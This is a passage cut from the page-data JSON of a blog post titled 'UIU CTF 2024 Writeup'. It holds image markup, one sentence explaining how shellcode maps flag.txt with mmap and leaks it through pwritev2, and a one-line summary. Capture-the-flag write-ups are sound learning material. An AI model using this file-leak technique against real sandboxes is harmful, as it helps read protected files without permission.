480w,\n/static/dd967deeb31b60eb62e6bb09ee833aeb/d9199/image-20240708195518246.png 960w,\n/static/dd967deeb31b60eb62e6bb09ee833aeb/19a15/image-20240708195518246.png 1229w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dd967deeb31b60eb62e6bb09ee833aeb/d9199/image-20240708195518246.png\"\n            alt=\"image-20240708195518246\"\n            title=\"image-20240708195518246\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>In this code, using <code class=\"language-text\">PROT_READ</code> with <code class=\"language-text\">mmap</code> allocates a memory region containing data read from the file descriptor for <code class=\"language-text\">flag.txt</code>, and by using that address as the buffer pointed to by <code class=\"language-text\">iov</code>, leaking the flag with <code class=\"language-text\">pwritev2</code> becomes possible.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>Shellcode has a lot of depth.</p>","fields":{"slug":"/ctf-uiuctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-07-09","description":"UIU CTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","English"],"title":"UIU CTF 2024 Writeup","socialImage":{"publicURL":"/static/3cc57840f9adfdecc482e8326c859d5c/ctf-uiuctf-2024.png"}}}},"pageContext":{"slug":"/ctf-uiuctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}